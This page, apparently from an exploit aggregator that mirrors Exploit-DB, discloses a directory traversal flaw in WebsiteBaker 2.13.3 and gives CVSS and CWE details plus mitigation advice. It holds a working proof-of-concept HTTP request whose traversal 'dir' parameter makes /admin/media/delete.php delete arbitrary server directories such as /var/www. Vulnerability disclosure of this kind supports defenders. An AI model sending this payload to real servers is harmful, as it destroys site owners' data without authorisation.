header-logo
Suggest Exploit
vendor:
WebsiteBaker
by:
Mirabbas Agalarov
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: WebsiteBaker
Affected Version From: 2.13.3
Affected Version To: 2.13.3
Patch Exists: NO
Related CWE:
CPE: a:websitebaker:websitebaker:2.13.3
Metasploit:
Other Scripts:
Platforms Tested: Linux
2023

WebsiteBaker v2.13.3 – Directory Traversal

The WebsiteBaker v2.13.3 application is vulnerable to a directory traversal attack. An attacker can delete arbitrary directories by sending a specially crafted HTTP request to the /admin/media/delete.php endpoint. This can lead to unauthorized access and potential data loss.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patch or upgrade to a newer version of the WebsiteBaker application. Additionally, access to the /admin/media/delete.php endpoint should be restricted to authorized users only.
Source

Exploit-DB raw data:

Exploit Title: WebsiteBaker v2.13.3 - Directory Traversal
Application: WebsiteBaker
Version: 2.13.3
Bugs:  Directory Traversal
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date of found: 26.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
=======================================

arbitary directory deleting

GET /admin/media/delete.php?dir=/../../../../../..//var/www&id=a838b6ebe8ba43a0 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/admin/media/browse.php?dir=/../../../../../..//var/www
Cookie: PHPSESSID-WB-6e6c39=bvnampsc5ji2drm439ph49143c; klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin

Navigation

Suggest Exploit

Services By CQR